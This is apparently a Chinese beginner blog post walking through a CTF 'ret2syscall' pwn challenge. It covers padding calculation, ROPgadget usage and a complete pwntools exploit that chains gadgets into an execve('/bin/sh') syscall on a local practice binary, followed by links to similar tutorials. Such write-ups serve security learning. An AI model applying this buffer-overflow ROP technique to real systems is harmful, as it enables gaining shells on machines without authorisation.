PWN GADGET 入门

最新推荐文章于 2024-05-27 19:13:50 发布
最新推荐文章于 2024-05-27 19:13:50 发布
阅读量908 收藏 2
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_39617633/article/details/108786807
版权

PWN GADGET 入门

checksec

在这里插入图片描述

拖入相应的IDA

在这里插入图片描述

playload构造

  1. 漏洞点 gets()

  2. 无canary,开启栈保护(NX ENABLE),无法直接将shellcode写入栈,需要gadget

  3. 计算padding

    1. IDA反编译直接查看

      距离ebp为0x64,根据返回地址在ebp下一个字长处,所以总padding为0x64+0x4

      但是失败。IDA有坑!

    2. GDB查看栈

      填充0x86个a
      在这里插入图片描述

      使用gdb.attach()下断点至gets之后查看栈弹出。
      在这里插入图片描述
      stack 100 查看栈
      在这里插入图片描述
      所以 0x68 + 0x2

    3. cyclic计算

      payload = cyclic(0x200)

      GDB 调试,c至出错,找到对应字符串

      cyclic -l 'aaab'

寻找gadget

   #利用命令
   ROPgadget --binary ret2syscall  --ropchain   #自动生成ROP
   
   ROPgadget --binary [file] --only "pop|ret"  #单次查询
   
   ROPgadget --binary ret2syscall > gadgets  #输出至文件,适合多次
   
   grep "pop eax ; ret" gadgets #加空格
   
   grep -P "pop ecx .* ret" gadgets #正则

   0x08049421  : int 0x80
   
   0x080BE408    :'/bin/sh'
   
   0
   
   0x0806eb91 : pop ecx ; pop ebx ; ret
   
   0
   
   0x0806eb6a : pop edx ; ret
   
   0xb
   
   0x080bb196 : pop eax ; ret

最终exp

# -*- coding:utf-8 -*-
from  pwn  import *

context.terminal=["tmux","sp","-h"]   #tmux配置

io = process("./ret2syscall")

io.recvuntil("What do you plan to do?\n")

payload = "a"*(0x68+0x2) + p32(0x080bb196)+p32(0xb)+p32(0x0806eb6a)+p32(0)+p32(0x0806eb91)+p32(0)+p32(0x080BE408)+p32(0x08049421)

#payload = cyclic(0x200)

#payload = flat([])

gdb.attach(io,"b *0x08048EA0")  

io.sendline(payload)

io.interactive()

PWN YES!

在这里插入图片描述

Ophryon
关注
pwn中的万能gadget函数
Assassin
04-08 680
pwn的过程中,有一些一般程序都有的万能gadget函数,特别时程序在初始化的时候一般会有下面函数,就为构造ROP链提供了原材料 _init _start call_gmon_start deregister_tm_clones register_tm_clones __do_global_dtors_aux frame_dummy __libc_csu_init __libc_csu_fini _fini _dl_runtime_resolve __libc_csu_init .text:000000
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
热门推荐
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
一个简单的Gadget
03-09
一个简单的Gadget
xnuca2018-pwn-0gadget
sunrise的博客
11-24 780
off-by-one double free,uaf fast-bin-attack 函数功能: add函数中有一个off-by-one溢出,可以修改下一个本数组的堆指针的最后一个字节,使其指向最后一字节为'\x00'的堆块 用off-by-one修改后,free这个unsortedbin堆块,然后显示其中的fd,得到libc基址 同理,用do...
PWN入门之通用gadgets
weixin_44681716的博客
04-09 2882
实验目的 针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用的gadgets,从而更利于我们继续ROP操作。 实验文件 这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。 ...
Google Gadget 开发入门(一)Gadget的组成——两个视角
lawrenst的专栏
05-06 806
转载自:http://www.blogjava.net/zhenandaci/archive/2009/02/05/253460.html 在Gadget开发人员看来——我当然是指你我这样的IT民工,来开发一个Gadget的人,而不是Google大楼里成天琢磨怎么和微软对着干的那帮子人——一个Gadget由三大部分组成:描述UI的一系列.xml文件;存放程序逻辑的.js文件以及资源。 ...
pwn小白入门01---环境配置
weixin_45943522的博客
02-20 623
操作系统: 任意Linux或wsl;推荐:Ubuntu18.04+Ubuntu16.04 IDA pro7.5(Windows): 链接: https://pan.baidu.com/s/1pCMudY3RNBLQ3uobf8xBVg 提取码: asqa 复制这段内容后打开百度网盘手机App,操作更方便哦 下载完后解压打开,免安装,双击即可运行; 用来打开32位程序; 用来打开64位程序; pwntools pwntools是python的一个库,目前已适应python3,建议同时安装python2和p
PWN入门学习
qq_20254219的博客
10-20 2508
基础PWN知识入门 二进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存中。 在磁盘中的是节,映射到内存就是段。 在执行过程中,存储在磁盘中具有相同权限的节会被映射到内存中合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8259
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
pwn入门之fastbin attack
清霂的博客
04-02 327
目录floworeo b站原本有一个对堆基础讲的挺好的,好像叫pwn术进阶的堆溢出,但刚刚去看已经没了,好家伙,还好我刚看完,哈哈哈。 flow 涅普计划-ctf入门课堆溢出 #!/usr/bin/env python2 from pwn import * context(os="linux", arch="amd64", log_level="debug") #libc libc=ELF("libc.so.6") malloc_libc=libc.symbols['__malloc_hook'] m
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1628
pwn练习1-ret2syscall(ROP-gadget)
PWn基本工具安装
最新发布
weixin_61804402的博客
05-27 260
main_arena_offset——一个简单的 shell 脚本,用于获取给定 libc 的偏移量。one_gadget ——一键找到 shell 地址。ROPgadget——ROP命令找到的gadget。checksec ——检测文件保护机制。LibcSearcher——代替。在github上克隆pwndbg。IDA Pro——静态代码分析。pwndbg——动态调试。
Gadget寻找
kelxLZ的博客
06-25 502
Author:ZERO-A-ONE Date:2021-06-25 我们可以选择使用ROPgadget或者ropper两款工具 查找gadget: $ ROPgadget --binary [file] | grep "xxx" $ ropper --file [file] --search "xxx" 生成ROPchain: $ ropper --file [file] --chain execve $ ROPgadget --binary [file] --ropchain ...
Pwn
bluestar628的博客
07-11 2478
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import * p = remote ("139.224.220.67" ,30004) payload = 'a'*0x501 p.sendline(payload) p.interactive()Pwn2打开IDA分析,是一个经...
[pwn]ROP:使用通用gadget
Breeze的博客
07-06 1万+
[详细] ROP:使用通用gadget 这次试用的是LCTF2016的试题pwn100,参考i春秋上的这篇文章 在这里详细讲解如何利用通用gadget构造一个复杂的ROP链。 通用gadget介绍 介绍一段通用的gadget,通常出现在64elf位文件的__libc_csu_init函数中(截图来自本程序pwn100,很多64位二进制文件都有): 这其中有三段gadget,第一段是 pop ...
ROPR:一款功能强大的极速多线程ROPGadget查找工具
阿道夫的博客
02-10 1487
Programming),即返回导向编程,而ROPGadget是一些包含汇编指令的代码段,通常以ret指令结尾,这些指令已经作为可执行代码存在于每个源码文件或代码库中,而这些小工具可用于二进制攻击,并破坏易受攻击的可执行文件。大多数可执行文件包含足够的小工具来编写ROP链一旦我们知道了地址,就可以使用包含在同一地址空间(如libc)中的动态库。而使用ROPGadget的好处在于,无需在任何地方编写新的可执行代码,攻击者可以仅使用程序中已经存在的代码来实现其目标。这时候你当然需要一份系统性的学习路线。
PWN基础之构造ROP链(基本ROP)
weixin_46132162的博客
02-02 4501
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
Fastjson 1.2.68漏洞分析与gadget寻找思路
ys_wanmei的博客
06-16 2656
Fastjson最新漏洞RCE利用分析1、背景2、漏洞分析&Gadget利用2.1、漏洞分析2.2、Gadget寻找思路总结Reference 1、背景 前段时间fastjson爆发了一个可以绕过autotype开关的反序列化漏洞,在1.2.68及以下版本中均受影响,黑客可利用该漏洞直接获取服务器系统权限并远程执行任意命令。 2、漏洞分析&Gadget利用 前几天看了网上大佬发的漏洞原理分析文档,在这里又重新通过调试代码的方式分析一下大概的漏洞触发原理。 2.1、漏洞分析 从fastjson
pwn-内存泄漏one_gadget
leeham的博客
08-22 5819
pwn-内存泄漏/one_gadget 题目描述 题目可以下载到本地 https://github.com/LeeHaming/CTF-learn/blob/master/Caniso/Casino 解题思路 1.IDA分析函数逻辑 F5; 热键F5可以看到反汇编之后的程序逻辑;结合函数实际运行情况,可以得到这样的函数流程图: 此外我们可以找到修改mone...
ctfshow pwn入门
09-29
ctfshow pwn入门是一个关于ASLR(地址空间布局随机化)的题目。在该题目中,程序会读取系统中/proc/sys/kernel/randomize_va_space文件的内容,如果内容为0,则输出的flag是正确的,否则输出的flag是错误的。所以,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值